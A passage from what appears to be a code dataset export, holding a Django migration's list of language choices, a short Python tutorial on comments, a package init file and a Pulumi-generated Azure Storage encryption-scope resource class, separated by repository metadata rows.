("ff-Latn-SN", "Fulah (Latin, Senegal)"),
("fi", "Finnish"),
("fi-FI", "Finnish (Finland)"),
("fil", "Filipino"),
("fil-PH", "Filipino (Philippines)"),
("fo", "Faroese"),
("fo-DK", "Faroese (Denmark)"),
("fo-FO", "Faroese (Faroe Islands)"),
("fr", "French"),
("fr-BE", "French (Belgium)"),
("fr-BF", "French (Burkina Faso)"),
("fr-BI", "French (Burundi)"),
("fr-BJ", "French (Benin)"),
("fr-BL", "French (St. Barthélemy)"),
("fr-CA", "French (Canada)"),
("fr-CD", "French (Congo - Kinshasa)"),
("fr-CF", "French (Central African Republic)"),
("fr-CG", "French (Congo - Brazzaville)"),
("fr-CH", "French (Switzerland)"),
("fr-CI", "French (Côte d’Ivoire)"),
("fr-CM", "French (Cameroon)"),
("fr-DJ", "French (Djibouti)"),
("fr-DZ", "French (Algeria)"),
("fr-FR", "French (France)"),
("fr-GA", "French (Gabon)"),
("fr-GF", "French (French Guiana)"),
("fr-GN", "French (Guinea)"),
("fr-GP", "French (Guadeloupe)"),
("fr-GQ", "French (Equatorial Guinea)"),
("fr-HT", "French (Haiti)"),
("fr-KM", "French (Comoros)"),
("fr-LU", "French (Luxembourg)"),
("fr-MA", "French (Morocco)"),
("fr-MC", "French (Monaco)"),
("fr-MF", "French (St. Martin)"),
("fr-MG", "French (Madagascar)"),
("fr-ML", "French (Mali)"),
("fr-MQ", "French (Martinique)"),
("fr-MR", "French (Mauritania)"),
("fr-MU", "French (Mauritius)"),
("fr-NC", "French (New Caledonia)"),
("fr-NE", "French (Niger)"),
("fr-PF", "French (French Polynesia)"),
("fr-PM", "French (St. Pierre & Miquelon)"),
("fr-RE", "French (Réunion)"),
("fr-RW", "French (Rwanda)"),
("fr-SC", "French (Seychelles)"),
("fr-SN", "French (Senegal)"),
("fr-SY", "French (Syria)"),
("fr-TD", "French (Chad)"),
("fr-TG", "French (Togo)"),
("fr-TN", "French (Tunisia)"),
("fr-VU", "French (Vanuatu)"),
("fr-WF", "French (Wallis & Futuna)"),
("fr-YT", "French (Mayotte)"),
("fur", "Friulian"),
("fur-IT", "Friulian (Italy)"),
("fy", "Western Frisian"),
("fy-NL", "Western Frisian (Netherlands)"),
("ga", "Irish"),
("ga-GB", "Irish (United Kingdom)"),
("ga-IE", "Irish (Ireland)"),
("gd", "Scottish Gaelic"),
("gd-GB", "Scottish Gaelic (United Kingdom)"),
("gl", "Galician"),
("gl-ES", "Galician (Spain)"),
("gsw", "Swiss German"),
("gsw-CH", "Swiss German (Switzerland)"),
("gsw-FR", "Swiss German (France)"),
("gsw-LI", "Swiss German (Liechtenstein)"),
("gu", "Gujarati"),
("gu-IN", "Gujarati (India)"),
("guz", "Gusii"),
("guz-KE", "Gusii (Kenya)"),
("gv", "Manx"),
("gv-IM", "Manx (Isle of Man)"),
("ha", "Hausa"),
("ha-GH", "Hausa (Ghana)"),
("ha-NE", "Hausa (Niger)"),
("ha-NG", "Hausa (Nigeria)"),
("haw", "Hawaiian"),
("haw-US", "Hawaiian (United States)"),
("he", "Hebrew"),
("he-IL", "Hebrew (Israel)"),
("hi", "Hindi"),
("hi-IN", "Hindi (India)"),
("hr", "Croatian"),
("hr-BA", "Croatian (Bosnia & Herzegovina)"),
("hr-HR", "Croatian (Croatia)"),
("hsb", "Upper Sorbian"),
("hsb-DE", "Upper Sorbian (Germany)"),
("hu", "Hungarian"),
("hu-HU", "Hungarian (Hungary)"),
("hy", "Armenian"),
("hy-AM", "Armenian (Armenia)"),
("ia", "Interlingua"),
("id", "Indonesian"),
("id-ID", "Indonesian (Indonesia)"),
("ig", "Igbo"),
("ig-NG", "Igbo (Nigeria)"),
("ii", "Sichuan Yi"),
("ii-CN", "Sichuan Yi (China)"),
("is", "Icelandic"),
("is-IS", "Icelandic (Iceland)"),
("it", "Italian"),
("it-CH", "Italian (Switzerland)"),
("it-IT", "Italian (Italy)"),
("it-SM", "Italian (San Marino)"),
("it-VA", "Italian (Vatican City)"),
("ja", "Japanese"),
("ja-JP", "Japanese (Japan)"),
("jgo", "Ngomba"),
("jgo-CM", "Ngomba (Cameroon)"),
("jmc", "Machame"),
("jmc-TZ", "Machame (Tanzania)"),
("jv", "Javanese"),
("jv-ID", "Javanese (Indonesia)"),
("ka", "Georgian"),
("ka-GE", "Georgian (Georgia)"),
("kab", "Kabyle"),
("kab-DZ", "Kabyle (Algeria)"),
("kam", "Kamba"),
("kam-KE", "Kamba (Kenya)"),
("kde", "Makonde"),
("kde-TZ", "Makonde (Tanzania)"),
("kea", "Kabuverdianu"),
("kea-CV", "Kabuverdianu (Cape Verde)"),
("khq", "Koyra Chiini"),
("khq-ML", "Koyra Chiini (Mali)"),
("ki", "Kikuyu"),
("ki-KE", "Kikuyu (Kenya)"),
("kk", "Kazakh"),
("kk-KZ", "Kazakh (Kazakhstan)"),
("kkj", "Kako"),
("kkj-CM", "Kako (Cameroon)"),
("kl", "Kalaallisut"),
("kl-GL", "Kalaallisut (Greenland)"),
("kln", "Kalenjin"),
("kln-KE", "Kalenjin (Kenya)"),
("km", "Khmer"),
("km-KH", "Khmer (Cambodia)"),
("kn", "Kannada"),
("kn-IN", "Kannada (India)"),
("ko", "Korean"),
("ko-KP", "Korean (North Korea)"),
("ko-KR", "Korean (South Korea)"),
("kok", "Konkani"),
("kok-IN", "Konkani (India)"),
("ks", "Kashmiri"),
("ks-Arab", "Kashmiri (Arabic)"),
("ks-Arab-IN", "Kashmiri (Arabic, India)"),
("ksb", "Shambala"),
("ksb-TZ", "Shambala (Tanzania)"),
("ksf", "Bafia"),
("ksf-CM", "Bafia (Cameroon)"),
("ksh", "Colognian"),
("ksh-DE", "Colognian (Germany)"),
("ku", "Kurdish"),
("ku-TR", "Kurdish (Turkey)"),
("kw", "Cornish"),
("kw-GB", "Cornish (United Kingdom)"),
("ky", "Kyrgyz"),
("ky-KG", "Kyrgyz (Kyrgyzstan)"),
("lag", "Langi"),
("lag-TZ", "Langi (Tanzania)"),
("lb", "Luxembourgish"),
("lb-LU", "Luxembourgish (Luxembourg)"),
("lg", "Ganda"),
("lg-UG", "Ganda (Uganda)"),
("lkt", "Lakota"),
("lkt-US", "Lakota (United States)"),
("ln", "Lingala"),
("ln-AO", "Lingala (Angola)"),
("ln-CD", "Lingala (Congo - Kinshasa)"),
("ln-CF", "Lingala (Central African Republic)"),
("ln-CG", "Lingala (Congo - Brazzaville)"),
("lo", "Lao"),
("lo-LA", "Lao (Laos)"),
("lrc", "Northern Luri"),
("lrc-IQ", "Northern Luri (Iraq)"),
("lrc-IR", "Northern Luri (Iran)"),
("lt", "Lithuanian"),
("lt-LT", "Lithuanian (Lithuania)"),
("lu", "Luba-Katanga"),
("lu-CD", "Luba-Katanga (Congo - Kinshasa)"),
("luo", "Luo"),
("luo-KE", "Luo (Kenya)"),
("luy", "Luyia"),
("luy-KE", "Luyia (Kenya)"),
("lv", "Latvian"),
("lv-LV", "Latvian (Latvia)"),
("mai", "Maithili"),
("mai-IN", "Maithili (India)"),
("mas", "Masai"),
("mas-KE", "Masai (Kenya)"),
("mas-TZ", "Masai (Tanzania)"),
("mer", "Meru"),
("mer-KE", "Meru (Kenya)"),
("mfe", "Morisyen"),
("mfe-MU", "Morisyen (Mauritius)"),
("mg", "Malagasy"),
("mg-MG", "Malagasy (Madagascar)"),
("mgh", "Makhuwa-Meetto"),
("mgh-MZ", "Makhuwa-Meetto (Mozambique)"),
("mgo", "Metaʼ"),
("mgo-CM", "Metaʼ (Cameroon)"),
("mi", "Maori"),
("mi-NZ", "Maori (New Zealand)"),
("mk", "Macedonian"),
("mk-MK", "Macedonian (North Macedonia)"),
("ml", "Malayalam"),
("ml-IN", "Malayalam (India)"),
("mn", "Mongolian"),
("mn-MN", "Mongolian (Mongolia)"),
("mni", "Manipuri"),
("mni-Beng", "Manipuri (Bangla)"),
("mni-Beng-IN", "Manipuri (Bangla, India)"),
("mr", "Marathi"),
("mr-IN", "Marathi (India)"),
("ms", "Malay"),
("ms-BN", "Malay (Brunei)"),
("ms-ID", "Malay (Indonesia)"),
("ms-MY", "Malay (Malaysia)"),
("ms-SG", "Malay (Singapore)"),
("mt", "Maltese"),
("mt-MT", "Maltese (Malta)"),
("mua", "Mundang"),
("mua-CM", "Mundang (Cameroon)"),
("my", "Burmese"),
("my-MM", "Burmese (Myanmar (Burma))"),
("mzn", "Mazanderani"),
("mzn-IR", "Mazanderani (Iran)"),
("naq", "Nama"),
("naq-NA", "Nama (Namibia)"),
("nb", "Norwegian Bokmål"),
("nb-NO", "Norwegian Bokmål (Norway)"),
("nb-SJ", "Norwegian Bokmål (Svalbard & Jan Mayen)"),
("nd", "North Ndebele"),
("nd-ZW", "North Ndebele (Zimbabwe)"),
("nds", "Low German"),
("nds-DE", "Low German (Germany)"),
("nds-NL", "Low German (Netherlands)"),
("ne", "Nepali"),
("ne-IN", "Nepali (India)"),
("ne-NP", "Nepali (Nepal)"),
("nl", "Dutch"),
("nl-AW", "Dutch (Aruba)"),
("nl-BE", "Dutch (Belgium)"),
("nl-BQ", "Dutch (Caribbean Netherlands)"),
("nl-CW", "Dutch (Curaçao)"),
("nl-NL", "Dutch (Netherlands)"),
("nl-SR", "Dutch (Suriname)"),
("nl-SX", "Dutch (Sint Maarten)"),
("nmg", "Kwasio"),
("nmg-CM", "Kwasio (Cameroon)"),
("nn", "Norwegian Nynorsk"),
("nn-NO", "Norwegian Nynorsk (Norway)"),
("nnh", "Ngiemboon"),
("nnh-CM", "Ngiemboon (Cameroon)"),
("nus", "Nuer"),
("nus-SS", "Nuer (South Sudan)"),
("nyn", "Nyankole"),
("nyn-UG", "Nyankole (Uganda)"),
("om", "Oromo"),
("om-ET", "Oromo (Ethiopia)"),
("om-KE", "Oromo (Kenya)"),
("or", "Odia"),
("or-IN", "Odia (India)"),
("os", "Ossetic"),
("os-GE", "Ossetic (Georgia)"),
("os-RU", "Ossetic (Russia)"),
("pa", "Punjabi"),
("pa-Arab", "Punjabi (Arabic)"),
("pa-Arab-PK", "Punjabi (Arabic, Pakistan)"),
("pa-Guru", "Punjabi (Gurmukhi)"),
("pa-Guru-IN", "Punjabi (Gurmukhi, India)"),
("pcm", "Nigerian Pidgin"),
("pcm-NG", "Nigerian Pidgin (Nigeria)"),
("pl", "Polish"),
("pl-PL", "Polish (Poland)"),
("prg", "Prussian"),
("ps", "Pashto"),
("ps-AF", "Pashto (Afghanistan)"),
("ps-PK", "Pashto (Pakistan)"),
("pt", "Portuguese"),
("pt-AO", "Portuguese (Angola)"),
("pt-BR", "Portuguese (Brazil)"),
("pt-CH", "Portuguese (Switzerland)"),
("pt-CV", "Portuguese (Cape Verde)"),
("pt-GQ", "Portuguese (Equatorial Guinea)"),
("pt-GW", "Portuguese (Guinea-Bissau)"),
("pt-LU", "Portuguese (Luxembourg)"),
("pt-MO", "Portuguese (Macao SAR China)"),
("pt-MZ", "Portuguese (Mozambique)"),
("pt-PT", "Portuguese (Portugal)"),
("pt-ST", "Portuguese (São Tomé & Príncipe)"),
("pt-TL", "Portuguese (Timor-Leste)"),
("qu", "Quechua"),
("qu-BO", "Quechua (Bolivia)"),
("qu-EC", "Quechua (Ecuador)"),
("qu-PE", "Quechua (Peru)"),
("rm", "Romansh"),
("rm-CH", "Romansh (Switzerland)"),
("rn", "Rundi"),
("rn-BI", "Rundi (Burundi)"),
("ro", "Romanian"),
("ro-MD", "Romanian (Moldova)"),
("ro-RO", "Romanian (Romania)"),
("rof", "Rombo"),
("rof-TZ", "Rombo (Tanzania)"),
("ru", "Russian"),
("ru-BY", "Russian (Belarus)"),
("ru-KG", "Russian (Kyrgyzstan)"),
("ru-KZ", "Russian (Kazakhstan)"),
("ru-MD", "Russian (Moldova)"),
("ru-RU", "Russian (Russia)"),
("ru-UA", "Russian (Ukraine)"),
("rw", "Kinyarwanda"),
("rw-RW", "Kinyarwanda (Rwanda)"),
("rwk", "Rwa"),
("rwk-TZ", "Rwa (Tanzania)"),
("sah", "Sakha"),
("sah-RU", "Sakha (Russia)"),
("saq", "Samburu"),
("saq-KE", "Samburu (Kenya)"),
("sat", "Santali"),
("sat-Olck", "Santali (Ol Chiki)"),
("sat-Olck-IN", "Santali (Ol Chiki, India)"),
("sbp", "Sangu"),
("sbp-TZ", "Sangu (Tanzania)"),
("sd", "Sindhi"),
("sd-Arab", "Sindhi (Arabic)"),
("sd-Arab-PK", "Sindhi (Arabic, Pakistan)"),
("sd-Deva", "Sindhi (Devanagari)"),
("sd-Deva-IN", "Sindhi (Devanagari, India)"),
("se", "Northern Sami"),
("se-FI", "Northern Sami (Finland)"),
("se-NO", "Northern Sami (Norway)"),
("se-SE", "Northern Sami (Sweden)"),
("seh", "Sena"),
("seh-MZ", "Sena (Mozambique)"),
("ses", "Koyraboro Senni"),
("ses-ML", "Koyraboro Senni (Mali)"),
("sg", "Sango"),
("sg-CF", "Sango (Central African Republic)"),
("shi", "Tachelhit"),
("shi-Latn", "Tachelhit (Latin)"),
("shi-Latn-MA", "Tachelhit (Latin, Morocco)"),
("shi-Tfng", "Tachelhit (Tifinagh)"),
("shi-Tfng-MA", "Tachelhit (Tifinagh, Morocco)"),
("si", "Sinhala"),
("si-LK", "Sinhala (Sri Lanka)"),
("sk", "Slovak"),
("sk-SK", "Slovak (Slovakia)"),
("sl", "Slovenian"),
("sl-SI", "Slovenian (Slovenia)"),
("smn", "Inari Sami"),
("smn-FI", "Inari Sami (Finland)"),
("sn", "Shona"),
("sn-ZW", "Shona (Zimbabwe)"),
("so", "Somali"),
("so-DJ", "Somali (Djibouti)"),
("so-ET", "Somali (Ethiopia)"),
("so-KE", "Somali (Kenya)"),
("so-SO", "Somali (Somalia)"),
("sq", "Albanian"),
("sq-AL", "Albanian (Albania)"),
("sq-MK", "Albanian (North Macedonia)"),
("sq-XK", "Albanian (Kosovo)"),
("sr", "Serbian"),
("sr-Cyrl", "Serbian (Cyrillic)"),
("sr-Cyrl-BA", "Serbian (Cyrillic, Bosnia & Herzegovina)"),
("sr-Cyrl-ME", "Serbian (Cyrillic, Montenegro)"),
("sr-Cyrl-RS", "Serbian (Cyrillic, Serbia)"),
("sr-Cyrl-XK", "Serbian (Cyrillic, Kosovo)"),
("sr-Latn", "Serbian (Latin)"),
("sr-Latn-BA", "Serbian (Latin, Bosnia & Herzegovina)"),
("sr-Latn-ME", "Serbian (Latin, Montenegro)"),
("sr-Latn-RS", "Serbian (Latin, Serbia)"),
("sr-Latn-XK", "Serbian (Latin, Kosovo)"),
("su", "Sundanese"),
("su-Latn", "Sundanese (Latin)"),
("su-Latn-ID", "Sundanese (Latin, Indonesia)"),
("sv", "Swedish"),
("sv-AX", "Swedish (Åland Islands)"),
("sv-FI", "Swedish (Finland)"),
("sv-SE", "Swedish (Sweden)"),
("sw", "Swahili"),
("sw-CD", "Swahili (Congo - Kinshasa)"),
("sw-KE", "Swahili (Kenya)"),
("sw-TZ", "Swahili (Tanzania)"),
("sw-UG", "Swahili (Uganda)"),
("ta", "Tamil"),
("ta-IN", "Tamil (India)"),
("ta-LK", "Tamil (Sri Lanka)"),
("ta-MY", "Tamil (Malaysia)"),
("ta-SG", "Tamil (Singapore)"),
("te", "Telugu"),
("te-IN", "Telugu (India)"),
("teo", "Teso"),
("teo-KE", "Teso (Kenya)"),
("teo-UG", "Teso (Uganda)"),
("tg", "Tajik"),
("tg-TJ", "Tajik (Tajikistan)"),
("th", "Thai"),
("th-TH", "Thai (Thailand)"),
("ti", "Tigrinya"),
("ti-ER", "Tigrinya (Eritrea)"),
("ti-ET", "Tigrinya (Ethiopia)"),
("tk", "Turkmen"),
("tk-TM", "Turkmen (Turkmenistan)"),
("to", "Tongan"),
("to-TO", "Tongan (Tonga)"),
("tr", "Turkish"),
("tr-CY", "Turkish (Cyprus)"),
("tr-TR", "Turkish (Turkey)"),
("tt", "Tatar"),
("tt-RU", "Tatar (Russia)"),
("twq", "Tasawaq"),
("twq-NE", "Tasawaq (Niger)"),
("tzm", "Central Atlas Tamazight"),
("tzm-MA", "Central Atlas Tamazight (Morocco)"),
("ug", "Uyghur"),
("ug-CN", "Uyghur (China)"),
("uk", "Ukrainian"),
("uk-UA", "Ukrainian (Ukraine)"),
("ur", "Urdu"),
("ur-IN", "Urdu (India)"),
("ur-PK", "Urdu (Pakistan)"),
("uz", "Uzbek"),
("uz-Arab", "Uzbek (Arabic)"),
("uz-Arab-AF", "Uzbek (Arabic, Afghanistan)"),
("uz-Cyrl", "Uzbek (Cyrillic)"),
("uz-Cyrl-UZ", "Uzbek (Cyrillic, Uzbekistan)"),
("uz-Latn", "Uzbek (Latin)"),
("uz-Latn-UZ", "Uzbek (Latin, Uzbekistan)"),
("vai", "Vai"),
("vai-Latn", "Vai (Latin)"),
("vai-Latn-LR", "Vai (Latin, Liberia)"),
("vai-Vaii", "Vai (Vai)"),
("vai-Vaii-LR", "Vai (Vai, Liberia)"),
("vi", "Vietnamese"),
("vi-VN", "Vietnamese (Vietnam)"),
("vo", "Volapük"),
("vun", "Vunjo"),
("vun-TZ", "Vunjo (Tanzania)"),
("wae", "Walser"),
("wae-CH", "Walser (Switzerland)"),
("wo", "Wolof"),
("wo-SN", "Wolof (Senegal)"),
("xh", "Xhosa"),
("xh-ZA", "Xhosa (South Africa)"),
("xog", "Soga"),
("xog-UG", "Soga (Uganda)"),
("yav", "Yangben"),
("yav-CM", "Yangben (Cameroon)"),
("yi", "Yiddish"),
("yo", "Yoruba"),
("yo-BJ", "Yoruba (Benin)"),
("yo-NG", "Yoruba (Nigeria)"),
("yue", "Cantonese"),
("yue-Hans", "Cantonese (Simplified)"),
("yue-Hans-CN", "Cantonese (Simplified, China)"),
("yue-Hant", "Cantonese (Traditional)"),
("yue-Hant-HK", "Cantonese (Traditional, Hong Kong SAR China)"),
("zgh", "Standard Moroccan Tamazight"),
("zgh-MA", "Standard Moroccan Tamazight (Morocco)"),
("zh", "Chinese"),
("zh-Hans", "Chinese (Simplified)"),
("zh-Hans-CN", "Chinese (Simplified, China)"),
("zh-Hans-HK", "Chinese (Simplified, Hong Kong SAR China)"),
("zh-Hans-MO", "Chinese (Simplified, Macao SAR China)"),
("zh-Hans-SG", "Chinese (Simplified, Singapore)"),
("zh-Hant", "Chinese (Traditional)"),
("zh-Hant-HK", "Chinese (Traditional, Hong Kong SAR China)"),
("zh-Hant-MO", "Chinese (Traditional, Macao SAR China)"),
("zh-Hant-TW", "Chinese (Traditional, Taiwan)"),
("zu", "Zulu"),
("zu-ZA", "Zulu (South Africa)"),
],
default="en",
max_length=35,
),
),
]
| [
"[email protected]"
] | |
4f429af341e1d6a151535732aff18ab72fe74f77 | 443fbf0cdd31bb65db09e2b1f3e9770adc69c08d | /Python 1/1 - Introducion/5 - Comentarios/Comentarios.py | 63b10fefa4166d61ecf646f0d8d2eb7abb60000e | [] | no_license | marcvifi10/Curso-Python | b9b376c39713e525756eb26f31f914359aef537a | 047830ca92e027c7d37e2f6bb042971a773a5d6d | refs/heads/master | 2020-07-15T08:30:53.622053 | 2019-09-18T16:23:35 | 2019-09-18T16:23:35 | 205,521,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | # Comentario de una sola linea
'''
Comentarios de
más de una linea
'''
valor = 10
print("Valor1: ",valor)
valor = "Marc"
print("Valor2: ",valor) | [
"[email protected]"
] | |
1693a2db33c64357463d0eae112a25a4a985fb94 | 60d1a67f71d87db55feaa9424081ba74e5c4da0c | /tensor2struct/__init__.py | 73011f353e015638f8dbc1392192838313ce349b | [
"MIT"
] | permissive | ashutoshbsathe/tensor2struct-public | 4313308398164f2f2576aec9d55b48c834c0325b | cfcafa94f10565bc25a72c172a9e58dfa4170fe7 | refs/heads/main | 2023-08-03T09:04:29.269648 | 2021-09-18T09:34:13 | 2021-09-18T09:34:13 | 407,810,567 | 0 | 0 | MIT | 2021-09-18T09:03:56 | 2021-09-18T09:03:55 | null | UTF-8 | Python | false | false | 113 | py | from . import models
from . import modules
from . import datasets
from . import contexts
from . import languages
| [
"[email protected]"
] | |
28bcb6383ea9d9eaa24f48fe4c6a536b56fdeeca | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/storage/v20210401/encryption_scope.py | 6a96d42af449b84f8c8ce339996a18581fd0adb2 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 17,446 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['EncryptionScopeArgs', 'EncryptionScope']
@pulumi.input_type
class EncryptionScopeArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
encryption_scope_name: Optional[pulumi.Input[str]] = None,
key_vault_properties: Optional[pulumi.Input['EncryptionScopeKeyVaultPropertiesArgs']] = None,
require_infrastructure_encryption: Optional[pulumi.Input[bool]] = None,
source: Optional[pulumi.Input[Union[str, 'EncryptionScopeSource']]] = None,
state: Optional[pulumi.Input[Union[str, 'EncryptionScopeState']]] = None):
"""
The set of arguments for constructing a EncryptionScope resource.
:param pulumi.Input[str] account_name: The name of the storage account within the specified resource group. Storage account names must be between 3 and 24 characters in length and use numbers and lower-case letters only.
:param pulumi.Input[str] resource_group_name: The name of the resource group within the user's subscription. The name is case insensitive.
:param pulumi.Input[str] encryption_scope_name: The name of the encryption scope within the specified storage account. Encryption scope names must be between 3 and 63 characters in length and use numbers, lower-case letters and dash (-) only. Every dash (-) character must be immediately preceded and followed by a letter or number.
:param pulumi.Input['EncryptionScopeKeyVaultPropertiesArgs'] key_vault_properties: The key vault properties for the encryption scope. This is a required field if encryption scope 'source' attribute is set to 'Microsoft.KeyVault'.
:param pulumi.Input[bool] require_infrastructure_encryption: A boolean indicating whether or not the service applies a secondary layer of encryption with platform managed keys for data at rest.
:param pulumi.Input[Union[str, 'EncryptionScopeSource']] source: The provider for the encryption scope. Possible values (case-insensitive): Microsoft.Storage, Microsoft.KeyVault.
:param pulumi.Input[Union[str, 'EncryptionScopeState']] state: The state of the encryption scope. Possible values (case-insensitive): Enabled, Disabled.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if encryption_scope_name is not None:
pulumi.set(__self__, "encryption_scope_name", encryption_scope_name)
if key_vault_properties is not None:
pulumi.set(__self__, "key_vault_properties", key_vault_properties)
if require_infrastructure_encryption is not None:
pulumi.set(__self__, "require_infrastructure_encryption", require_infrastructure_encryption)
if source is not None:
pulumi.set(__self__, "source", source)
if state is not None:
pulumi.set(__self__, "state", state)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
"""
The name of the storage account within the specified resource group. Storage account names must be between 3 and 24 characters in length and use numbers and lower-case letters only.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group within the user's subscription. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="encryptionScopeName")
def encryption_scope_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the encryption scope within the specified storage account. Encryption scope names must be between 3 and 63 characters in length and use numbers, lower-case letters and dash (-) only. Every dash (-) character must be immediately preceded and followed by a letter or number.
"""
return pulumi.get(self, "encryption_scope_name")
@encryption_scope_name.setter
def encryption_scope_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "encryption_scope_name", value)
@property
@pulumi.getter(name="keyVaultProperties")
def key_vault_properties(self) -> Optional[pulumi.Input['EncryptionScopeKeyVaultPropertiesArgs']]:
"""
The key vault properties for the encryption scope. This is a required field if encryption scope 'source' attribute is set to 'Microsoft.KeyVault'.
"""
return pulumi.get(self, "key_vault_properties")
@key_vault_properties.setter
def key_vault_properties(self, value: Optional[pulumi.Input['EncryptionScopeKeyVaultPropertiesArgs']]):
pulumi.set(self, "key_vault_properties", value)
@property
@pulumi.getter(name="requireInfrastructureEncryption")
def require_infrastructure_encryption(self) -> Optional[pulumi.Input[bool]]:
"""
A boolean indicating whether or not the service applies a secondary layer of encryption with platform managed keys for data at rest.
"""
return pulumi.get(self, "require_infrastructure_encryption")
@require_infrastructure_encryption.setter
def require_infrastructure_encryption(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "require_infrastructure_encryption", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[Union[str, 'EncryptionScopeSource']]]:
"""
The provider for the encryption scope. Possible values (case-insensitive): Microsoft.Storage, Microsoft.KeyVault.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[Union[str, 'EncryptionScopeSource']]]):
pulumi.set(self, "source", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[Union[str, 'EncryptionScopeState']]]:
"""
The state of the encryption scope. Possible values (case-insensitive): Enabled, Disabled.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[Union[str, 'EncryptionScopeState']]]):
pulumi.set(self, "state", value)
class EncryptionScope(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
encryption_scope_name: Optional[pulumi.Input[str]] = None,
key_vault_properties: Optional[pulumi.Input[pulumi.InputType['EncryptionScopeKeyVaultPropertiesArgs']]] = None,
require_infrastructure_encryption: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[Union[str, 'EncryptionScopeSource']]] = None,
state: Optional[pulumi.Input[Union[str, 'EncryptionScopeState']]] = None,
__props__=None):
"""
The Encryption Scope resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The name of the storage account within the specified resource group. Storage account names must be between 3 and 24 characters in length and use numbers and lower-case letters only.
:param pulumi.Input[str] encryption_scope_name: The name of the encryption scope within the specified storage account. Encryption scope names must be between 3 and 63 characters in length and use numbers, lower-case letters and dash (-) only. Every dash (-) character must be immediately preceded and followed by a letter or number.
:param pulumi.Input[pulumi.InputType['EncryptionScopeKeyVaultPropertiesArgs']] key_vault_properties: The key vault properties for the encryption scope. This is a required field if encryption scope 'source' attribute is set to 'Microsoft.KeyVault'.
:param pulumi.Input[bool] require_infrastructure_encryption: A boolean indicating whether or not the service applies a secondary layer of encryption with platform managed keys for data at rest.
:param pulumi.Input[str] resource_group_name: The name of the resource group within the user's subscription. The name is case insensitive.
:param pulumi.Input[Union[str, 'EncryptionScopeSource']] source: The provider for the encryption scope. Possible values (case-insensitive): Microsoft.Storage, Microsoft.KeyVault.
:param pulumi.Input[Union[str, 'EncryptionScopeState']] state: The state of the encryption scope. Possible values (case-insensitive): Enabled, Disabled.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: EncryptionScopeArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
The Encryption Scope resource.
:param str resource_name: The name of the resource.
:param EncryptionScopeArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(EncryptionScopeArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
encryption_scope_name: Optional[pulumi.Input[str]] = None,
key_vault_properties: Optional[pulumi.Input[pulumi.InputType['EncryptionScopeKeyVaultPropertiesArgs']]] = None,
require_infrastructure_encryption: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[Union[str, 'EncryptionScopeSource']]] = None,
state: Optional[pulumi.Input[Union[str, 'EncryptionScopeState']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = EncryptionScopeArgs.__new__(EncryptionScopeArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["encryption_scope_name"] = encryption_scope_name
__props__.__dict__["key_vault_properties"] = key_vault_properties
__props__.__dict__["require_infrastructure_encryption"] = require_infrastructure_encryption
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["source"] = source
__props__.__dict__["state"] = state
__props__.__dict__["creation_time"] = None
__props__.__dict__["last_modified_time"] = None
__props__.__dict__["name"] = None
